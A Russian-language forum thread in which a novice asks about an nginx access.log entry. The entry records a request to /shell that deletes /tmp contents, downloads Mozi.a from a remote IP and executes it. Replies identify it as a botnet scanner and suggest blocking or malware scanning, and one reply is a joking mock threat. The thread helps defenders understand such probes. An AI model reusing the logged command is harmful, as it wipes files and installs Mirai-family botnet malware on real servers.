nginx access.log

0

1

здравствуйте, обнаружил в access.log нжынкса такую запись:

112.123.174.55 - - [30/Dec/2020:13:36:27 +0700] «GET /shell?cd+/tmp;rm+-rf+*;wget+http://112.123.174.55:33942/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1» 404 169 «-» «Hello, world»

по ссылке скачивается mirai. я пользователь неопытный, подскажите что с этим делать и что это вообще значит?

Ссылка

←	Cryfs - ханипот или нет?

Логирование BrainyCp Как защитить себя от взлома

→

подскажите что с этим делать и что это вообще значит?

Сегодня распечатка этого треда легла на стол очень важному человеку.
Администрация ресурса подконтрольна, потому все ваши данные уже есть.
Вам дают несколько дней, после чего делу дадут ход.
Подумайте если не о себе, то о ваших близких.
Потом будет поздно. Лучше остановитесь и закройте обсуждение

zolden ★★★★★
(30.12.20 11:36:45 MSK)

Пытаются через дыры веб-сервисов подсадить заразу.

gruy ★★★★★
(30.12.20 11:38:03 MSK)

Ссылка

Ответ на: комментарий от zolden 30.12.20 11:36:45 MSK

хаха ага

ип китайский, можно было и про летучею мышь отшутиться. я имел ввиду, может сервисы какието есть, протестировать безопасность сервака?

cuteKitten
(30.12.20 11:47:54 MSK) автор топика

Бот перебирает уязвимости. Я подобное много раз видел. Или забанить весь Китай, или забить, если у тебя уязвимых к этим запросам сервисов нет.

Radjah ★★★★★
(30.12.20 12:16:29 MSK)

Ссылка

Ответ на: хаха ага от cuteKitten 30.12.20 11:47:54 MSK

Стоит всем URL зловреда добавлять в общую базу: https://urlhaus.abuse.ch и с нее же брать черный список для блокировки. Банить страну целиком может быть не целесообразно.

Для сканирования своих веб серваков можно использовать: https://www.rfxn.com/projects/linux-malware-detect/

anonymous
(30.12.20 15:47:24 MSK)